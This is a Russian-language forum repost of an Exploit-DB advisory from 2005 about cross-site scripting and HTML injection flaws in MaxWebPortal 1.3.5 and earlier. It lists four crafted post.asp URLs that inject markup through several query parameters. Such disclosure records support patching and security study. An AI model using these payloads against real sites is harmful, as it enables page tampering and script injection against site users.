Exploit Maxwebportal 1.3x - 'post.asp' Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25651
Проверка EDB
  1. Пройдено
Автор
ZINHO
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2005-1561
Дата публикации
2005-05-11
Код:
source: https://www.securityfocus.com/bid/13601/info

MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks.

MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to these issues. 

Cross-site Scripting
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&mod="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&M="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="><plaintext>

HTML Injection:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext>
 
Источник
www.exploit-db.com

Похожие темы